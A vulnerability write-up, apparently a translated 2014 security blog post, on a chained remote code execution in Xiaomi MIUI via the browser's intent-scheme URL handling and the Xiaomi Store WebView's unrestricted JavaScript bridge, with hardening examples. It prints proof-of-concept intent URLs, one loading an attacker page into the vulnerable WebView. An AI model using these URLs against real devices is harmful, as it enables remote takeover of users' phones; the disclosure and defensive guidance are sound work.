In July, while studying WebView vulnerabilities in MIUI on Xiaomi phones, I found a very obvious security flaw. It lets a remote web page reach local apps, breaking the boundary between local and remote vulnerabilities so that a vulnerability in a local app can be exploited remotely, ultimately achieving remote code execution. As soon as the vulnerability was discovered I reported the details to the Xiaomi Security Response Center, and it has now been fixed.
Test environment:
Phone model: MI 3
Android version: 4.2.1 JOP40D
MIUI version: Miui-jxccnbe21
Kernel version: 3.4.35-ga656ab9
I. The Xiaomi MIUI native browser has an intent protocol security issue
While using the Xiaomi native browser I noticed that MIUI customizes the network-error page: when the current URL is unreachable or the network is down, the browser jumps to a custom page, and clicking a link on that page takes you straight into the WiFi settings screen.
From past experience, there are two mainstream ways for an app to let a static web page perform inter-process communication. One is to add a JavaScript bridge to the WebView via addJavascriptInterface, so that page script can call the local Java object directly. The other is to parse URLs with Intent.parseUri so that the app supports intent scheme URLs (intent protocol URLs): a URL in a particular format is parsed into an Intent and sent directly to the system.
Testing confirmed that the Xiaomi browser fully supports intent scheme URLs. Pointing the browser at the following address makes it hand the parsed intent to the system, which launches the local calendar app:
intent:#Intent;component=com.android.calendar/com.android.calendar.LaunchActivity;end
Looking at the Intent source in Google's official framework (platform/frameworks/base, core/java/android/content/Intent.java), the definition of Intent.parseUri around line 3966 handles typed extras as follows:
// Intent.parseUri: the prefix before the "." selects the Java type of the extra,
// so a URL author chooses both the key and the typed value that lands in the Bundle.
if (uri.startsWith("S.", i)) b.putString(key, value);
else if (uri.startsWith("B.", i)) b.putBoolean(key, Boolean.parseBoolean(value));
else if (uri.startsWith("b.", i)) b.putByte(key, Byte.parseByte(value));
else if (uri.startsWith("c.", i)) b.putChar(key, value.charAt(0));
else if (uri.startsWith("d.", i)) b.putDouble(key, Double.parseDouble(value));
else if (uri.startsWith("f.", i)) b.putFloat(key, Float.parseFloat(value));
else if (uri.startsWith("i.", i)) b.putInt(key, Integer.parseInt(value));
else if (uri.startsWith("l.", i)) b.putLong(key, Long.parseLong(value));
else if (uri.startsWith("s.", i)) b.putShort(key, Short.parseShort(value));
else throw new URISyntaxException(uri, "unknown EXTRA type", i);
It is clear that a URL parsed by Intent.parseUri can fully specify the extras, data, action, component and so on, so by formatting the protocol address appropriately an attacker can send an arbitrary intent to any local app. If an exported component of a local app has a vulnerability, that vulnerability can also be attacked remotely through this entry point.
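To make the browser-side issue concrete, here is an added example (not the MIUI browser's code) of a WebViewClient that handles intent: URLs, first in the unsafe form described above and then hardened. The class name and the behaviour on failure are assumptions; the calendar URL is the one from the text. The hardening is the standard advice for intent scheme URLs: strip any explicit component and selector so the page cannot pick its own target, require CATEGORY_BROWSABLE so only activities that opted in to being launched from the web can match, and keep non-web data URIs out of the implicit intent.

```java
import android.content.ActivityNotFoundException;
import android.content.Intent;
import android.net.Uri;
import android.webkit.WebView;
import android.webkit.WebViewClient;

import java.net.URISyntaxException;

/**
 * Added example, not the MIUI browser's code: handling intent: URLs in a WebView.
 */
public class IntentSchemeClient extends WebViewClient {

    // The intent: URL from the text, which launches the stock calendar app.
    static final String CALENDAR_URL =
            "intent:#Intent;component=com.android.calendar/com.android.calendar.LaunchActivity;end";

    // UNSAFE: whatever the page puts after "intent:" is handed to the system as-is.
    // The URL author controls action, data, component and typed extras (S., B., i., ...),
    // so any exported component, including one that is not BROWSABLE, is reachable remotely.
    static void openUnsafe(WebView view, String url) {
        try {
            Intent intent = Intent.parseUri(url, Intent.URI_INTENT_SCHEME);
            view.getContext().startActivity(intent);
        } catch (URISyntaxException e) {
            // malformed intent: URL, ignore
        } catch (ActivityNotFoundException e) {
            // nothing matched, ignore
        }
    }

    // Hardened: the page may only make an implicit, BROWSABLE request.
    static void openHardened(WebView view, String url) {
        Intent intent;
        try {
            intent = Intent.parseUri(url, Intent.URI_INTENT_SCHEME);
        } catch (URISyntaxException e) {
            return;
        }
        intent.addCategory(Intent.CATEGORY_BROWSABLE); // only web-launchable activities match
        intent.setComponent(null);                     // the page cannot name a target class
        intent.setSelector(null);                      // API 15+: a selector would bypass the filter match
        // Keep file:// and content:// data out of an intent that came from a web page.
        Uri data = intent.getData();
        if (data != null && !"http".equals(data.getScheme()) && !"https".equals(data.getScheme())) {
            return;
        }
        try {
            view.getContext().startActivity(intent);
        } catch (ActivityNotFoundException e) {
            // no BROWSABLE activity matched; with CALENDAR_URL this is the expected outcome,
            // because the explicit component was dropped and LaunchActivity is not BROWSABLE
        }
    }

    @Override
    public boolean shouldOverrideUrlLoading(WebView view, String url) {
        if (url.startsWith("intent:")) {
            openHardened(view, url);
            return true; // consumed; never load the intent: URL in the WebView itself
        }
        return false;
    }
}
```

With the hardened handler, the calendar URL above no longer launches anything, and the proof-of-concept URL in part two cannot reach com.xiaomi.shop.activity.MainActivity either, because the explicit component is discarded before startActivity.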
II. The Xiaomi Store app has a WebView remote code execution vulnerability
Following the line of thought from part one, I began auditing the preinstalled and built-in apps in MIUI, hoping to uncover vulnerabilities that could be exploited remotely. During automated vulnerability scanning I found that the WebView in Xiaomi's official app "Xiaomi Store" uses addJavascriptInterface and the app targets an API level below 17, so the @JavascriptInterface restriction does not apply and a WebView remote code execution vulnerability is possible.
So I reverse-engineered the app and found several exported components, for example com.xiaomi.shop.activity.MainActivity, which accepts a parameter from external callers that makes it load an arbitrary page.
I also found that the com.xiaomi.shop.ui class associated with this component registers a vulnerable JavaScript interface named We via addJavascriptInterface, without any security handling.
From the reversed code, the extra accepted by the com.xiaomi.shop.activity.MainActivity activity is a string (the S. prefix in the URL below). Combined with the intent protocol vulnerability in the Xiaomi browser from part one, it is easy to write a proof-of-concept: by loading an attacker-controlled web page into the WebView that exposes the vulnerable JavaScript interface, we can execute arbitrary commands and Java code with the privileges of the app:
intent:#Intent;component=com.xiaomi.shop/com.xiaomi.shop.activity.MainActivity;S.com.xiaomi.shop.extra_closed_url=http://server/attack.html;end
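For the app side, here is an added example (not Xiaomi Store's code) of an activity that takes a URL from an Intent extra and loads it into a WebView with a JavaScript bridge, written the way the vulnerable activity should have been. The extra name is the one from the proof-of-concept URL above; the class name, the trusted host and the bridge object name are assumptions. Two things matter: the externally supplied URL is checked against the app's own origin before loadUrl, and a bridge is only exposed where the platform enforces @JavascriptInterface, which also requires the app's targetSdkVersion to be 17 or higher. If the activity does not need to be called by other apps at all, the manifest should additionally declare it with android:exported="false".

```java
import android.annotation.SuppressLint;
import android.app.Activity;
import android.net.Uri;
import android.os.Build;
import android.os.Bundle;
import android.webkit.JavascriptInterface;
import android.webkit.WebSettings;
import android.webkit.WebView;

/**
 * Added example, not Xiaomi Store's code: an activity that loads an externally
 * supplied URL into a WebView without handing the page a remote code execution primitive.
 */
public class SafeShopWebActivity extends Activity {

    // Extra name from the proof-of-concept URL in the text.
    static final String EXTRA_URL = "com.xiaomi.shop.extra_closed_url";

    // Only pages from the app's own origin may be loaded from an externally supplied
    // extra. The host is an assumption for this example.
    static final String TRUSTED_HOST = "m.mi.com";

    // Returns true only for https URLs on the trusted host; called before loadUrl.
    static boolean isTrustedUrl(String url) {
        if (url == null) return false;
        Uri uri = Uri.parse(url);
        return "https".equals(uri.getScheme()) && TRUSTED_HOST.equalsIgnoreCase(uri.getHost());
    }

    // The bridge object. On API 17+ with targetSdkVersion >= 17 only methods annotated
    // @JavascriptInterface are reachable from page script, so getClass() and the
    // reflection chain of CVE-2013-4710 are not.
    public static class ShopBridge {
        @JavascriptInterface
        public String version() { return "1.0"; }
    }

    @SuppressLint("SetJavaScriptEnabled")
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        WebView web = new WebView(this);
        setContentView(web);

        WebSettings settings = web.getSettings();
        settings.setJavaScriptEnabled(true);
        settings.setAllowFileAccess(false); // keep file:// out of reach of any loaded page

        // Below JELLY_BEAN_MR1 every public method of every reachable object is callable
        // from JS, which is exactly the RCE the report describes, so expose no bridge there.
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN_MR1) {
            web.addJavascriptInterface(new ShopBridge(), "shopBridge"); // name is an assumption
        }
        // Remove the bridge the platform itself injected into pre-4.4 WebViews.
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.HONEYCOMB) {
            web.removeJavascriptInterface("searchBoxJavaBridge_");
        }

        String url = getIntent().getStringExtra(EXTRA_URL);
        if (!isTrustedUrl(url)) {
            // Remote-supplied, foreign or malformed target: fall back to the app's own start page.
            url = "https://" + TRUSTED_HOST + "/";
        }
        web.loadUrl(url);
    }
}
```

Against the proof-of-concept URL above, isTrustedUrl rejects http://server/attack.html (wrong scheme and host), so the attacker's page is never loaded; even if it were, the page would see only version() on the bridge rather than the full object graph.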
III. Security recommendations
Android developers should pay attention to security as well as user experience, because a convenience feature in one app can make the whole system less secure.
If a malicious attacker exploited the vulnerability analyzed here, loading a remote malicious web page and chaining it with a root exploit could give direct control of the victim's phone; the consequences are hard to overstate. Xiaomi has reportedly fixed the Xiaomi Store app bug, and users of Xiaomi phones and MIUI are advised to upgrade as soon as possible.
References:
[1] https://github.com/android/platform_frameworks_base/blob/master/core/java/android/content/Intent.java
[2] http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4710
Original address: http://blogs.360.cn/360mobile/2014/08/25/miui-rce-vul/
Xiaomi mobile phone MIUI Remote Code execution Vulnerability Analysis